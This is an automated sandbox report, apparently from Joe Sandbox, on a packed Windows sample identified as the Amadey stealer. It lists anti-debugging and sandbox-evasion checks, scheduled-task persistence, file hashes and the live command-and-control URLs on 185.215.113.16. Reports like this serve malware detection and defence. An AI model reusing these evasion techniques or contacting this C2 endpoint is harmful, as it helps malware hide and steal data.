Source: file.exe, 00000000.00000002.2164125618.000000000119C000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2184795295.00000000002DC000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2188351893.00000000002DC000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04FB0C8C rdtsc

0_2_04FB0C8C

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0012645B mov eax, dword ptr fs:[00000030h]		6_2_0012645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0012A1C2 mov eax, dword ptr fs:[00000030h]		6_2_0012A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe	Binary or memory string: ?AProgram Manager
Source: file.exe, 00000000.00000002.2164125618.000000000119C000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2184795295.00000000002DC000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2188351893.00000000002DC000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: AProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_0010D312 cpuid

6_2_0010D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_0010CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_0010CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.axplong.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2184665079.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2691462580.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2075836324.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2148075647.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2164053615.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2144388732.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2188248851.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	55%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	55%	ReversingLabs	Win32.Packed.Themida

Source	Detection	Scanner	Label
http://185.215.113.16/Jo89Ku7d/index.php.	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpncoded15	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpj	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncodedC5	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php(	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpk	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php-	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php_	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpm	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpa	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpO	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.16/	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpN	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpL	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpI	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncodedU5	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpE	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=V	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpy	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpx	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpp5	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpu	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php1	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
206.23.85.13.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php.	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/Jo89Ku7d/index.php-	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpm	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpk	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpj	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php(	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpa	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php_	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded15	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedC5	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpO	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpN	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/	axplong.exe, 00000006.00000002.3328635806.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpM	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpL	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpI	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpE	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedU5	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=V	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpded	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpy	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpx	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpu	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpp5	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php1	axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519737
Start date and time:	2024-09-26 22:40:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 1772 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 2700 because there are no executed function
Execution Graph export aborted for target file.exe, PID 4564 because it is empty
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:42:01	API Interceptor	152312x Sleep call for process: axplong.exe modified
22:41:05	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Go Injector, XWorm	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1893888
Entropy (8bit):	7.950756889333077
Encrypted:	false
SSDEEP:	49152:Z2wOfdzTJRBzDCRWb1/qgOFf4kCM0N1XI6UGk:Z2l3J/PCyZO54kCM0N0
MD5:	897DBB00FC55B959A9210CA4A2E2A86B
SHA1:	DEF5D983D1BC402C14828EFF74671F79DBA14CC2
SHA-256:	BA7605A40879915531DAD0B3A34A23FE9F3CB46A6D73F0A560F53806CC8187F4
SHA-512:	8F489E46EE1A97274529A51F1849447657DD14CB650482DF63CACAEEAC353C4699EF9AC7A063768B6E7749A123DD771BC8DD3FB73B0D0742897A23EB36C49827
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................@K...........@..........................pK.....R.....@.................................W...k............................(K.............................p(K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...lstpvczs.....`1.....................@...hyconjie.....0K.....................@....taggant.0...@K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.400739557199024
Encrypted:	false
SSDEEP:	6:pWlNX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lb8ct0:pYDQ1lOmeeDNfXVJt0
MD5:	8A4E78AB000975203A7602AA315E339A
SHA1:	1A8EFBCA0FE78A4C88D840040723CE7E38D90772
SHA-256:	098D18510BDDEA8AAB164BBFF50C53279870E4A1840F358B45318620EA3C9CCB
SHA-512:	576F2ADA252859A1E2CDA029F798944115DA7F7B21B755333AF28D72BA3C98E99482ABD20572390DB7E746D54A47220FFB9937D9777DC048AEF8C2155D21424B
Malicious:	false
Reputation:	low
Preview:	.....3.vx..C.U1.9q.3F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................*.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950756889333077
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'893'888 bytes
MD5:	897dbb00fc55b959a9210ca4a2e2a86b
SHA1:	def5d983d1bc402c14828eff74671f79dba14cc2
SHA256:	ba7605a40879915531dad0b3a34a23fe9f3cb46a6d73f0a560f53806cc8187f4
SHA512:	8f489e46ee1a97274529a51f1849447657dd14cb650482df63cacaeeac353c4699ef9ac7a063768b6e7749a123dd771bc8dd3fb73b0d0742897a23eb36c49827
SSDEEP:	49152:Z2wOfdzTJRBzDCRWb1/qgOFf4kCM0N1XI6UGk:Z2l3J/PCyZO54kCM0N0
TLSH:	D795332BF833DA5CD89BAABFC98B2FC4D7D6A27039D69978D8B640946C10710F24171D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b4000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB80D1D206Ah
pinsrw mm3, word ptr [eax+eax], 00h
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b28c0	0x10	lstpvczs
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
